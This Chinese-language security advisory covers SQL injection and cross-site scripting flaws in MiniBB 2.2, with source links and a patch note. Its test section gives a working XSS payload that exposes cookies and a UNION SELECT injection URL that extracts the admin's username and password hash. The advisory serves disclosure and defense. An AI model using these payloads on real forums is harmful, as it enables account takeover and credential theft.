安全研究

安全漏洞
MiniBB多个SQL注入和跨站脚本漏洞

发布日期:2008-04-25
更新日期:2008-04-29

受影响系统:
MiniBB MiniBB 2.2
不受影响系统:
MiniBB MiniBB 2.2a
描述:
BUGTRAQ  ID: 28930

MiniBB(Minimalistic Bulletin Board)是一个线性的可定制电子布告栏程序。

MiniBB的实现上存在多个SQL注入漏洞,远程攻击者可能利用此漏洞对服务程序执行SQL注入攻击。

如果将action设置为registernew的话,MiniBB的index.php文件中没有正确地验证对lang参数的输入便返回给了用户,这可能允许攻击者在用户浏览器会话中执行任意HTML和脚本代码。

如果将action设置为userinfo的话,MiniBB的index.php文件中没有正确地过滤对xtr参数的输入便将其使用在了SQL查询中,这允许远程攻击者执行SQL注入攻击。

<*来源:GiReX
  
  链接:http://secunia.com/advisories/29997/
        http://milw0rm.com/exploits/5494
        http://www.minibb.net/forums/9_5110_0.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.example.com/[host]/[path]/index.php?action=registernew&glang[]=<script>alert(document.cookie)</script>
http://www.example.com/[host]/[path]/index.php?action=userinfo&user=-1&xtr=UNION+SELECT+0,concat(username,0x3a,user_password),0,0,0,0,0,0,0,0,0,0,0,0,0+FROM+minibbtable_users+WHERE+user_id=1

建议:
厂商补丁:

MiniBB
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.minibb.net/download.php?file=minibb

浏览次数:2667
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障